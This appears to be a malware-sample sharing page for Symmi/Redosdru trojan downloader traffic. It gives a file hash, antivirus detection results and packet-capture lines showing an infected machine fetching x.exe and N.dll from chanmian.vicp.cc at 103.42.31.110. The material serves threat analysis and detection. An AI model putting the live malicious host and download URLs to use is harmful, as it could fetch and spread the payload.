Symmi/Redosdru Malware Trojan Downloader PCAP file download traffic sample chanmian.vicp.cc

Download Attachments

  • 1 pcap x
    Date added: December 16, 2016 7:07 am Added by: admin File size: 76 KB Downloads: 91
SHA256: 87fca1b51945745dbdeb343b2e1f84032fcd36471145a6f50df4493ed0ee7475
File name: x.exe
Detection ratio: 43 / 55
Analysis date: 2016-12-16 07:01:54 UTC ( 0 minutes ago )
ALYac Gen:Variant.Symmi.29124 20161216
AVG Downloader.Generic14.AESC 20161215
AVware Trojan.Win32.Generic!BT 20161216
Ad-Aware Gen:Variant.Symmi.29124 20161216
AegisLab Troj.W32.Gen.lYYu 20161215
Antiy-AVL Trojan[Backdoor]/Win32.Farfli 20161216
Arcabit Trojan.Symmi.D71C4 20161216
Avast Win32:Dropper-OHP [Trj] 20161216
Avira (no cloud) TR/AD.Redosdru.tyrmh 20161216
Baidu Win32.Trojan-Downloader.Agent.cw 20161207
BitDefender Gen:Variant.Symmi.29124 20161216
Bkav W32.eHeur.Malware10 20161215
CAT-QuickHeal Trojan.Redosdru.29891 20161216
Comodo TrojWare.Win32.Redosdru.A 20161216
CrowdStrike Falcon (ML) malicious_confidence_100% (W) 20161024
ESET-NOD32 a variant of Win32/TrojanDownloader.Agent.CFM 20161216
Emsisoft Gen:Variant.Symmi.29124 (B) 20161216

2016-12-16 00:53:05.808394 IP 192.168.1.102.49938 > 103.42.31.110.80: Flags [P.], seq 0:319, ack 1, win 256, length 319: HTTP: GET /x.exe HTTP/1.1
E..g{E@…5….fg*.n…PP.z…..P…2…GET /x.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: chanmian.vicp.cc
Connection: Keep-Alive
Cookie: HFS_SID_=0.84990619821474
2016-12-16 00:54:22.726261 IP 192.168.1.102.63864 > 75.75.75.75.53: 1198+ A? chanmian.vicp.cc. (34)
E..>…….M…fKKKK.x.5.*……………chanmian.vicp.cc…..
2016-12-16 00:54:23.743419 IP 192.168.1.102.63865 > 75.75.75.75.53: 1198+ A? chanmian.vicp.cc. (34)
E..>…….L…fKKKK.y.5.*……………chanmian.vicp.cc…..
2016-12-16 00:54:24.049721 IP 192.168.1.102.49950 > 103.42.31.110.80: Flags [S], seq 2143463710, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4~.@…3j…fg*.n…P………. ……………..
2016-12-16 00:54:24.310775 IP 192.168.1.102.49950 > 103.42.31.110.80: Flags [.], ack 1463017123, win 256, length 0
E..(~.@…3u…fg*.n…P….W3..P…D………
2016-12-16 00:54:24.311282 IP 192.168.1.102.49950 > 103.42.31.110.80: Flags [P.], seq 0:110, ack 1, win 256, length 110: HTTP: GET /N.dll HTTP/1.1
E…~.@…3….fg*.n…P….W3..P…aS..GET /N.dll HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: chanmian.vicp.cc
Cache-Control: no-cache

Leave a Reply